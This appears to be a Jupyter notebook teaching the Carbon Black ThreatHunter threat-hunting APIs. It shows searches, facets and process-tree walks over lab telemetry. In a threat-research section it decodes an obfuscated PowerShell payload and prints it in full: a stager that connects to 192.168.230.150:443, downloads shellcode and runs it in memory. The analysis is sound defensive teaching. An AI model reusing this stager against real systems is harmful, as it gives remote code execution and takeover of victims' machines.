# CBTH API Demonstration

This Jupyter Notebook will demonstrate the use of the CB ThreatHunter APIs through both using raw APIs and also using the `cbapi` Python module.

**NOTE** the support for ThreatHunter in `cbapi` is still under development and the interfaces are subject
to change.

## Prerequisites

There are two prerequisites for using this code: first, you need credentials to log into the API for your
Cb PSC organization; and second, you need the `cbapi` bindings to use this Python code directly. If you
want to use another language, or to call the REST API endpoints manually, you won't need to install `cbapi`.

### API Credentials

The first step is to create connectors in your Cb PSC organization. Log into the console and follow the
instructions at https://developer.carbonblack.com/reference/cb-defense/authentication/ to create an`API` type connector

Once you have your connector, you'll need the following information:

1. URL endpoint (e.g. `defense-prod05.conferdeploy.net`) for the APIs. This is the same URL you would use for the PSC Web UI
2. Connector ID and API key for the API connector
4. "Org key" - this is a unique identifier for your org and is displayed on the top of API Keys page

### Install cbapi

The second step is only if you want to run this code directly. This python script uses the `cbapi`
module. The support for ThreatHunter in `cbapi` is being actively developed in a fork available from
https://github.com/trailofbits/cbapi-python/tree/tob-cbth. To run this code as-is, you need to `git clone`
that repository, change into the `tob-cbth` branch, and install `cbapi` in a virtualenv.

`cbapi` uses credential file to read the API secret keys. Whenever you write scripts to interact with the
Cb APIs (or any API for that matter) you should **always** keep your API secret keys separate from your script.
If your script is ever exposed, either intentionally (by sharing it), or accidentally, then your API token
could be compromised if it were embedded inside your script.

To learn more about credential files and `cbapi`, see the docs at https://cbapi.readthedocs.io/en/latest/#api-credentials.

## Documentation

More information on configuring `cbapi`:
https://cbapi.readthedocs.io/en/latest/installation.html

Documentation for the ThreatHunter APIs is now available on the Developer Network website at: https://developer.carbonblack.com/reference/cb-threathunter/

## Asynchronous Search Model
ThreatHunter is based on scalable and multi-tenant architecture that is capable of ingressing tens of millions of events per second. Searches are built to scale and perform.
Searches in ThreatHunter are asynchronous. This allows better experience to both API and UI user since search can be initiated quickly and results can be gathered later and incrementally. Another advantage is that results can be referenced over and over, without re-running the search.

![title](search.png)
1. When customer C1 searches for data through the search API, it is distributed across potentially large number of indices related to that customer and desired time frame, without touching unrelated indices.
2. Each index reports results back to the AWS S3 bucket.
3. Separate API call is used to retrieve data back. Result payload will always be aggregated and also contain information on the progress of the search.


## Imports

First things first, we import our `cbapi` module.

We can also enable debug logging, which will provide an output of the underlying REST API calls that 
are made to the backend.

Finally, we instantiate CbThreatHunterAPI using profile "devday" that we have configured outside of this Notbook.

In [2]:
# Import ThreatHunter and Defense modules.
# - the need to import Defense and use a separate API key will go away when the migration of platform
#   APIs to the Custom Connector type is complete.

from cbapi.psc.threathunter import *

# pretty printer for making the output more readable
import pprint
import time

# Import logging module to see the requests to the REST API

# import logging
# logging.basicConfig()
# logging.getLogger("cbapi").setLevel(logging.DEBUG)

th = CbThreatHunterAPI(profile="devday")    # This is the 'name' of your credential in the credential file
orgkey="7YZFGDDN"  # This is our orgkey. Please update with orgkey of the actual org you will manage

## Querying CBTH

As a first example, let's take a look for any processes that match our IOC: Children of `outlook.exe` processes that themselves start powershell. This might point to some malicious application started from the Outlook.

Query first has to be placed into Solr syntax. In this case, it will be
```
parent_name:outlook.exe childproc_name:powershell.exe
```

You could, for example, put this query as is in the ThreatHunter Investigate page and get the results. However, let's see how we could do this with APIs

## Using Curl

We will not use Curl in this demo, but here is how it would roughly be done. Details of API token are hidden in these examples.

Since queries are asynchronous, you would issue two requests. First would issue a query and return you a token:
```
$curl -H "Content-Type: application/json" -H "X-Auth-Token:XXXXXXXXXXXXXXXXXXXXXXXX/YYYYYYYYYY" -XPOST "https://defense-prod05.conferdeploy.net/threathunter/search/v1/orgs/7YZFGDDN/processes/search_jobs" -d '{
                         "search_params": {
                             "q": "parent_name:outlook.exe childproc_name:powershell.exe",
                             "sort": "process_name ASC"
                         }}'
```
Note how you can also specify sort

As a result of this, you will get something like:
```
{'query': {'cb.max_backend_timestamp': 1559244344000,
           'cb.max_device_timestamp': 1559244344000,
           'cb.min_backend_timestamp': 0,
           'cb.min_device_timestamp': 0,
           'q': '*:*',
           'rows': 500,
           'sort': 'process_name ASC',
           'start': 0},
 'query_id': '3e591d5e-6a43-4bae-90d6-76e815227b3d'}
 ```
Then, using query_id token, you can ask for results using Get request:
```
$curl -H "X-Auth-Token:XXXXXXXXXXXXXXXXXXXXXXXX/YYYYYYYYYY" -XGET "/threathunter/search/v1/orgs/7YZFGDDN/processes/search_jobs/3e591d5e-6a43-4bae-90d6-76e815227b3d/results?start_row=0&row_count=3"
```
This will give us first up to first 3 results of the query with information on progress to query completion (in case is still running).

## Using cbapi With Raw Request Calls

Now, instead of using raw curl, let's use help of our `cbapi` library to start the same asynchronous query. In the second step, we will actually not use full cbapi entity model, but just underlying session management and HTTP request wrapper. This still allows us to see low-level asynchronous API calls, but is simpler. Best of all, we don't have to keep our credential information inside the code.

We will also introduce few more APIs here.

## Query Validation
Query validation API checks query syntax and makes sure it is valid. This is useful in case we want to make sure our query is using correct syntax and field names. 
Let's try two validation requests - onewill use invalid syntax (wrong field name) and second will be valid:

In [68]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_validation?q=parent_path:outlook.exe childproc_name:powershell.exe")
pprint.pprint(ret)

ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_validation?q=parent_name:outlook.exe childproc_name:powershell.exe")
pprint.pprint(ret)


{'invalid_message': 'org.apache.solr.common.SolrException: undefined field '
                    'parent_path',
 'invalid_trigger_offset': 0,
 'valid': False,
 'value_search_query': False}
{'valid': True, 'value_search_query': False}


## Search
Now, let's execute actual search with the valid query. We will do two steps here:
1. Initiate search, and collect the query_id token.
2. Immediately query for status fof the search (without getting the results). Second step is optional but demonstrates the nature of asynchronous search

In [34]:
# Initiate search
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "parent_name:outlook.exe childproc_name:powershell.exe",
                             "sort": "process_name ASC"
                         }
                     })
pprint.pprint(ret.json())

# Grab our query id token
query_id = ret.json()["query_id"]

# Check the status
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}")
print("Query status:")
pprint.pprint(ret)

{'query': {'cb.max_backend_timestamp': 1559487447000,
           'cb.max_device_timestamp': 1559487447000,
           'cb.min_backend_timestamp': 0,
           'cb.min_device_timestamp': 0,
           'q': 'parent_name:outlook.exe childproc_name:powershell.exe',
           'rows': 500,
           'sort': 'process_name ASC',
           'start': 0},
 'query_id': '881716d1-b2ba-4d2d-9941-219e9882e13f'}
Query status:
{'completed': 9, 'contacted': 9}


Finally, using same API as we did with curl, we will ask for actual results. 
It is important to note that you can ask for these results as many time as you want, and as long as the query is complete, results will reflect original results. In other words, `results` endpoint doesn't re-execute the query - ot only returns back the previously stored results. 
These results will be stored for 30 days.

In [7]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start_row=0&row_count=3")
pprint.pprint(ret)

{'data': [{'backend_timestamp': '2019-05-21T15:56:45.670Z',
           'childproc_count': 0,
           'crossproc_count': 0,
           'device_id': 8929889,
           'device_name': 'desktop-1a1jgo5',
           'device_timestamp': '2019-05-07T23:30:41.254Z',
           'event_description': 'The application "<share><link '
                                'hash="5948a6366c6ddd600848c7454a70035028ef40f0238c3341716b1703e5d1ecfc">C:\\program '
                                'files (x86)\\microsoft '
                                'office\\office15\\excel.exe</link></share>" '
                                'invoked the application "<share><link '
                                'hash="d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5">C:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe</link></share>". '
                                'The operation was <accent>blocked</accent> '
                                'and the application <accent>terminated by Cb 

## Results Segmentation
Like Cb Response, each query result actually represents a process "segment" - that is, a set of events
associated with a process. 
If you issue default search request, all the segments will be returned, which could cause a lot of duplicate results for long-living processes.

For more information about process segments, see https://developer.carbonblack.com/reference/enterprise-response/6.1/process-api-changes/#new-immutable-model.

One way around this is to use `collapse` function available in Solr. In that case, CBTH will try its best to coalesce these results by process when possible, returning only the latest segment.
Still, you might still get duplicates in two cases:
1. If segments come from different indices
2. If there are too many results for Solr to group in each index (threshold for this is currently configured at 1M results)

In [3]:
# Initiate search without collapsing results
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "process_name:explorer.exe",
                             "sort": "process_name ASC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
# Check the status
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start=0&rows=0")
pprint.pprint(ret)

# Same search with collapse
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "process_name:explorer.exe",
                             "sort": "process_name ASC", 
                             "fq": "{!collapse field=process_collapse_id sort='device_timestamp desc'}"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
# Check the status
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results?start=0&rows=0")
pprint.pprint(ret)

{'data': [],
 'facets': {'facet_fields': {},
            'facet_intervals': {},
            'facet_queries': {},
            'facet_ranges': {},
            'num_found': 0},
 'query_id': '91c088ec-61a3-495c-b57e-3afe4a6cb243',
 'response_header': {'end_time': 1559505966000,
                     'num_available': 1789,
                     'num_found': 1824,
                     'searchers_meta': {'completed': 10, 'contacted': 10},
                     'start_time': 0}}
{'data': [],
 'facets': {'facet_fields': {},
            'facet_intervals': {},
            'facet_queries': {},
            'facet_ranges': {},
            'num_found': 0},
 'query_id': 'd38c10e9-d691-440b-8054-600cd0e62386',
 'response_header': {'end_time': 1559505969000,
                     'num_available': 153,
                     'num_found': 153,
                     'searchers_meta': {'completed': 10, 'contacted': 10},
                     'start_time': 0}}


## Completness of Results
CBTH will not always give you back all results. Instead, it will return first N results (aggregated top 500 results from each index by default). Intent of CBTH search is not to give you exhausted list, but to help you narrow down results to the small set, in order to find "needle in the haystack" of the attack.

In order to help you with this process, you can use Solr Facets, which are generated for the **entire** data set.
For more information on Solr facets, you can visit:
https://lucene.apache.org/solr/guide/7_7/faceting.html

Here is example how to do that:

In [11]:
# Initiate non-filtered search, faceting by process and device
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "*:*",
                             "rows": 0,   ## We don't want individual results here
                             "facet": True,
                             "facet.field": ["process_name", "device_name"], # Facet by two fields
                             "facet.mincount": 1,  # Don't return 0-result facets 
                             "sort": "backend_timestamp DESC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results")
pprint.pprint(ret)

{'data': [],
 'facets': {'facet_fields': {'device_name': {'bcrusher-mac.local': 1252,
                                             'desktop-1a1jgo5': 18319,
                                             'desktop-6rvhabb': 13518,
                                             'desktop-9omoop7': 30235,
                                             'desktop-cdbtest': 9537,
                                             'dtroi-mac.local': 949,
                                             'enduser01': 1703351,
                                             'gforge-mac.local': 1130,
                                             'jim-kirks-mac.local': 1811,
                                             'lq-01': 6772,
                                             'lq-03': 21874,
                                             'lq-04': 13437,
                                             'lq-06': 22843,
                                             'lq-07': 21393,
                                             '

Now that we have breakdown by devices and processes, we might want to dive into one of them, and this time, facet by time:

In [20]:
# Initiate filtered search, faceting by time
ret = th.post_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs", {
                         "search_params": {
                             "q": "device_name:rj-win10vmw device_name:rj-win10vmw",
                             "rows": 0,   ## We don't want individual results here
                             "facet": True,
                             "facet.range": ["device_timestamp"], # Facet by device timestamp
                             "facet.range.start": "2019-05-26T01:00:00Z", # From date
                             "facet.range.end": "2019-05-27T01:00:00Z", # Until date
                             "facet.range.gap": "+1HOUR",
                             "sort": "backend_timestamp DESC"
                         }
                     })
# Grab our query id token
query_id = ret.json()["query_id"]
time.sleep(2)
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/search_jobs/{query_id}/results")
pprint.pprint(ret["facets"]["facet_ranges"]["device_timestamp"]["counts"])


{'2019-05-26T01:00:00Z': 0,
 '2019-05-26T02:00:00Z': 0,
 '2019-05-26T03:00:00Z': 0,
 '2019-05-26T04:00:00Z': 0,
 '2019-05-26T05:00:00Z': 0,
 '2019-05-26T06:00:00Z': 0,
 '2019-05-26T07:00:00Z': 0,
 '2019-05-26T08:00:00Z': 0,
 '2019-05-26T09:00:00Z': 42,
 '2019-05-26T10:00:00Z': 0,
 '2019-05-26T11:00:00Z': 0,
 '2019-05-26T12:00:00Z': 361,
 '2019-05-26T13:00:00Z': 131,
 '2019-05-26T14:00:00Z': 983,
 '2019-05-26T15:00:00Z': 2444,
 '2019-05-26T16:00:00Z': 1181,
 '2019-05-26T17:00:00Z': 387,
 '2019-05-26T18:00:00Z': 43,
 '2019-05-26T19:00:00Z': 0,
 '2019-05-26T20:00:00Z': 0,
 '2019-05-26T21:00:00Z': 0,
 '2019-05-26T22:00:00Z': 0,
 '2019-05-26T23:00:00Z': 885,
 '2019-05-27T00:00:00Z': 509}


## Using Full cbapi Entity Model

Now, let's see how we can do this task simpler, using entity model. Note that entity model obscures  asynchronous nature of the query execution (still uses it under the covers) making this process even easier. Downside is that you might not have all APIs at your disposal and some of the APIs used under the covers might not be using the latest and greatest version.

In [9]:
query = th.select(Process).where("parent_name:outlook.exe childproc_name:powershell.exe")
query_results = list(query)            # get all results from this query into a list
pprint.pprint(query_results)

[<cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-00000544-00000000-1d504653629c21f> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-008dec01-000018b8-00000000-1d50ffe0384be28> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-008dec01-000018b8-00000000-1d50ffe0384be28> @ https://defense-prod05.conferdeploy.net,
 <cbapi.psc.threathu

As previously explained, some of the results will have the same process ID (aka process_guid). Therefore, we will create a map of unique process IDs ourselves.

In [10]:
unique_processes = {r.process_guid:r for r in query_results}
pprint.pprint(unique_processes)

{'7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00841a27-00001bb4-00000000-1d4fb36c99d10cd> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00000740-00000000-1d4fb981fa550e7> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00845349-00001908-00000000-1d4fbca034bbc93> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00884261-00000544-00000000-1d504653629c21f': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-00000544-00000000-1d504653629c21f> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb': <cbapi.psc.threathunter.models.Process: id 7YZFGDDN-00884261-0000083c-00000000-1d5052ce08a21cb> @ https://defense-prod05.conferdeploy.net,
 '7YZFGDDN-008dec01-00001

Let's take a look at one of the Process objects to see what sort of information is retrieved.

In [11]:
interesting_process_guid='7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8'
process = unique_processes[interesting_process_guid]
print(process)

Process object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-26T15:36:24.851Z
         childproc_count: 1
         crossproc_count: 7
      device_external_ip: 129.146.76.64
         device_group_id: 0
               device_id: 9408120
      device_internal_ip: 
             device_name: rj-win10vmw
               device_os: WINDOWS
        device_policy_id: 0
        device_timestamp: 2019-05-26T15:31:02.862Z
           filemod_count: 18
             index_class: default
           modload_count: 72
           netconn_count: 0
                  org_id: 7YZFGDDN
             parent_guid: 7YZFGDDN-008f8e78-00001194-00000000-1d513d7e370...
             parent_hash: ['0355d3fde2df1315a6677fe0b50b101a5e7ab2db39402...
             parent_name: c:\program files (x86)\microsoft office\office1...
              parent_pid: 4500
            partition_id: 0
         process_cmdl

There are a few things to note here:

1. The hash attributes are *arrays* and not strings. ThreatHunter tracks both the MD5 and SHA-256 hashes for binaries, so you'll see one ore two entries in the hash attributes.
2. The command line, username, and process PID are all arrays as well! This is done to accurately track activity during `fork` and `exec` on Unix systems. A process may `fork`, meaning that it clones itself into a different PID. That process may continue to execute the original binary, or replace itself with a different binary via `exec` later (causing the command line to change as well).

## Process Trees

Now let's see who called this process and what child processes it created. We can use the `tree` API to do this.

In [13]:
tree = process.tree()
pprint.pprint(tree)

<cbapi.psc.threathunter.models.Tree object at 0x3932ed0> @ https://defense-prod05.conferdeploy.net


The `tree` API is also synchronous, but `cbapi` hides this detail and will keep polling results until query is complete.

Let's now step through the tree:

In [14]:
def print_information(proc, depth=0):
    print("{0}| {1}, {2} started process {3}".format('---'*depth, proc.get("device_timestamp", ""), proc.get("process_username", "unknown"), proc.get("process_cmdline", proc.get("process_name", ""))))
    
def recurse_tree(t, depth=0):
    if not isinstance(t, list):
        t = [t]

    for i in t:
        print_information(i, depth)
        if 'children' in i:
            recurse_tree(i['children'], depth+1)

recurse_tree(tree.nodes)    


| 2019-05-26T15:40:48.700Z, ['RJ-WIN10VMW\\EndUser'] started process ['"C:\\Program Files (x86)\\Microsoft Office\\Office15\\OUTLOOK.EXE" ']
---| 2019-05-26T15:31:02.868Z, ['RJ-WIN10VMW\\EndUser'] started process ['"C:\\Program Files (x86)\\Microsoft Office\\Office15\\EXCEL.EXE" /dde']
------| 2019-05-26T15:30:41.314Z, ['RJ-WIN10VMW\\EndUser'] started process ['powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\" nVPbTttAEH33V4wsS9iKbTkXEA1C4qa0SG2KCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4cT3phdKXRalsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu41HRFFr5IS1WuTpUyImzP1jFUUhNsWqxbfIiO/lvn3GJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3Tzyy9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu9PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0nOjNRsN97rvemn34DDt9bO0u5/txTAY9CP4DqaiRFdKHUFQcnHTU2vzxttz3y41N1ULDP15TehzVsSBGw5k8msUKFcYBuUroge+z7yg/ge+6ZkkNrlCy61ojB

Now we can see the way Outlook process that started the whole thread, eventually starting the powershell

In [15]:
powershell_process = tree.nodes["children"][0]["children"][0]
pprint.pprint(powershell_process)

{'_s3_location': '1tzmuVdmSmaW0QwF6sPRqQ:16af4c61e94:3450:f3f:longTerm',
 'backend_timestamp': '2019-05-26T15:33:05.812Z',
 'childproc_count': 0,
 'crossproc_count': 0,
 'device_external_ip': '',
 'device_group': 'malware-workshop-policy',
 'device_group_id': 0,
 'device_id': 9408120,
 'device_internal_ip': '129.146.76.64',
 'device_name': 'rj-win10vmw',
 'device_os': 'WINDOWS',
 'device_policy_id': 0,
 'device_timestamp': '2019-05-26T15:30:41.314Z',
 'event_description': 'The application "<share><link '
                      'hash="d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5">C:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe</link></share>" '
                      'invoked the application "<share><link '
                      'hash="acdfbc988cc8c5846ca51421596654a63c99ef152eaa1ccb16f8790ca54107de">C:\\users\\enduser\\downloads\\ghhaefawkejvnkawe.bat</link></share>". ',
 'event_id': '75c787c47fcb11e996bedfe68c86904a',
 'event_type': 'CREATE_PROCESS',
 

## Process Summary
We could have also used process sumary API to get Json-formatted version of the immediate tree around our process:

In [16]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/summary?process_guid={interesting_process_guid}")
pprint.pprint(ret)

{'children': [{'_s3_location': 'N2ZmRaL5S8uOXU8Pws4v7g:16af4c92814:35f50:1294b:default',
               'backend_timestamp': '2019-05-26T15:36:24.851Z',
               'childproc_count': 4,
               'crossproc_count': 6,
               'device_external_ip': '129.146.76.64',
               'device_group_id': 0,
               'device_id': 9408120,
               'device_internal_ip': '',
               'device_name': 'rj-win10vmw',
               'device_os': 'WINDOWS',
               'device_policy_id': 0,
               'device_timestamp': '2019-05-26T15:30:41.099Z',
               'filemod_count': 31,
               'hits': True,
               'index_class': 'default',
               'modload_count': 49,
               'netconn_count': 1,
               'org_id': '7YZFGDDN',
               'parent_guid': '7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8',
               'parent_hash': ['2a30dac27f340726b1a7ade73eeddcbb',
                               '5948a6366c6ddd600848c

## Interlude: Threat Research Example
Let's dive deeper into anatomy of that powershel attack. First of all, We can see that cmdline was is actually base64ecoded encoded. Let's decode it:

In [18]:
import base64
cmdline_str ='nVPbTttAEH33V4wsS9iKbTkXEA1C4qa0SG2KCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4cT3phdKXRalsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu41HRFFr5IS1WuTpUyImzP1jFUUhNsWqxbfIiO/lvn3GJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3Tzyy9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu9PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0nOjNRsN97rvemn34DDt9bO0u5/txTAY9CP4DqaiRFdKHUFQcnHTU2vzxttz3y41N1ULDP15TehzVsSBGw5k8msUKFcYBuUroge+z7yg/ge+6ZkkNrlCy61ojBtuSr/HnHEWdfYbtXqazRrCzdnIWy+lQghZIVH09+QIHhsnnZdW6zh46OzH3fjP3R6p/M4x29hojGDr3RrLivK4y14k6yIMmq9OhxXYXCAbdzu6V47eI51xoS6c8k7N2MiHXC8URpyVdGdbLyDO5bVImrlBUmAxR3uBt1JLkkZDICAZ5wWC/1Xqfs+HRPOfK3OB8HQyqrRoIh0kZe4cLW3VDOg4oOHwxRPL4qBOP6K+o2WcbfpZljEMssjbOb+uNMkC06elNOUE7UoKdOmn3LplrpoRmrJuOggZz+35cczCYJPu2h5FMfwU4fWj3dTb18eKcbCJG8hebsyEckvJRCGWkExQGL2Aw4NBlm1FTmL5uP0B '
decoded_cmdline_str = base64.b64decode(cmdline_str)
print(decoded_cmdline_str)


b'\x9dS\xdbN\xdb@\x10}\xf7W\x8c,K\xd8\x8am9\x17\x10\rB\xe2\xa6\xb4Hm\x8a\x08j\x1f\xa2<8\x9b\x81lY\xefZ\xbb\xe3$\x86\xe6\xdf;\x06\xa7-\x88VU\x9f\x8e\xbd;s\xce\x99\xcb\x06\x02\x8e\xe1\xc4\xf7\xa6\x17J]\x16\xa5\xb1\x14\xfa\xf7h5\xaa~/](\xe5G3(\xab\xb9\x92\x02\x1c\xe5\xc4\x80\x1b\xe2{\xb8\xd4tE\x16\xbeHKU\xaeN\x952"l\xcf\xd61TR\x13lZ\xac[|\x88\x8e\xfe[\xe7\xdcbNx\xb3dX\xect\xaa\x96w\x15\xc3/\xe5\xf6\xeb7\xed\xf6\xa4Q\xf7O<\xb2\xf5c\xe0\xb8\xe81\xae\x93\xcf\xf3o(\x08&\xb5#,\xd21R:1\xe2\x1e\xc9\xb5\x08\xe1\xf4\x8d\xbb\xd3\xc5\xc2\xa2s\xa3\xbc\x90\xaa\x9e\r\x87,\x80\x96\x03\xd6\xc6\xde\xc7\xf0V\xc63\xde\xd4%r\xf8\x84\xb8\x88\xe2\xed\xc0+k\xc8\x08\xa3\xda\xd0\x1bQF^\xe0\xd2s\xa35\x1b\r\xf7\xba\xefzi\xf7\xe00\xed\xf5\xb3\xb4\xbb\x9f\xed\xc50\x18\xf4#\xf8\x0e\xa6\xa2DWJ\x1dAPrq\xd3Sk\xf3\xc6\xdbs\xdf.57U\x0b\x0c\xfdyM\xe8sV\xc4\x81\x1b\x0ed\xf2k\x14(W\x18\x06\xe5+\xa2\x07\xbe\xcf\xbc\xa0\xfe\x07\xbe\xe9\x99$6\xb9B\xcb\xadh\x8c\x1bnJ\xbf\xc7\x9cq\x16u\xf6\x1b\xb5z\x9a\xcd\x1a\xc2\xcd\xd9\xc8[/\xa

We got raw byte stream. However, if you pay attention to the powershell cmdline, you will see that this stream is additionally compressed - very common obfuscation method.
Let's import zlib and decompress it:

In [19]:
import zlib
print(zlib.decompress(decoded_cmdline_str, -15))

b'$c = @"\n[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);\n[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);\n"@\ntry{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)\n$s.Connect(\'192.168.230.150\', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0\n$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF\nwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }\nfor ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}\n$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)\n[System.Runtime.I

There we go - we can now see the attacker's code.

Now, let's also look at other things  that this process did. For example, let's look at that connection. For that, we can dive into events of the process, using Event entity object:

In [20]:
events = th.select(Event).where(process_guid=powershell_process["process_guid"]).and_(event_type="netconn")
for event in events:
    print(event)

Event object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-26T15:36:24.851Z
       created_timestamp: 2019-06-01T18:29:41.561Z
              event_guid: FEs0uqUIQay1IpPnozXdeA
              event_hash: 8d2452e0cc67f72e8dfd0db338e7f115
         event_timestamp: 2019-05-26T15:30:31.928Z
              event_type: netconn
                  legacy: False
          netconn_action: ACTION_CONNECTION_CREATE
         netconn_inbound: False
      netconn_local_ipv4: -1062672893
      netconn_local_port: 49853
        netconn_protocol: PROTO_TCP
     netconn_remote_ipv4: -1062672746
     netconn_remote_port: 443
            process_guid: 7YZFGDDN-008f8e78-000012fc-00000000-1d513d7f378...


In [21]:
# in case you were wondering what those IP addresses were...
import socket
import struct
socket.inet_ntoa(struct.pack('>i', -1062672746))

'192.168.230.150'

Now we can verify the scope of our intrusion by searching the dataset for any other hosts that may have connected to this malicious network address:

In [22]:
infected_host_query = th.select(Process).where("netconn_ipv4:192.168.230.150")
infected_hosts = set([h.device_name for h in infected_host_query])
print(infected_hosts)

{'rj-win10vmw', 'desktop-1a1jgo5', 'enduser01'}


# Binary Information
Now what about binaries? In CBR, binary information is stored in a separate `module` store that you can query. 
In CBTH, binary information is stored in two different places:
1. Selected binary metadata is stored with the process information, and recorded at the time when process was reporting events
2. Much more metadata, including first seen paths, devices and signatures, as well as phisical binaries, are stored in Unified Binary Store

## Metada Interlieved with Process Data
Metadata interlieved with process data can be used for searching, but not retrieving data

In [23]:
query = th.select(Process).where("process_publisher:Microsoft \
                                 process_publisher_state:FILE_SIGNATURE_STATE_SIGNED \
                                 process_publisher_state:FILE_SIGNATURE_STATE_VERIFIED")
print(query[0].process_name)
print(query[2].process_name)
print(query[20].process_name)

query = th.select(Process).where("process_file_description:Outlook")
print(query[0].process_name)
print(query[100].process_name)
print(query[110].process_name)


c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe
c:\program files\windowsapps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\hxtsr.exe
c:\program files (x86)\microsoft office\office15\outlook.exe
c:\program files\windowsapps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\hxtsr.exe


## Unified Binary Store

Unified Binary Store (UBS) has its own set of APIs that are documented here:

https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/
Here are some examples.
First, let's get metadata of one of the binaries on our devices (powershell from above):

In [24]:
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/metadata")
pprint.pprint(res)

{'architecture': ['x86'],
 'available_file_size': 430080,
 'charset_id': 1200,
 'comments': None,
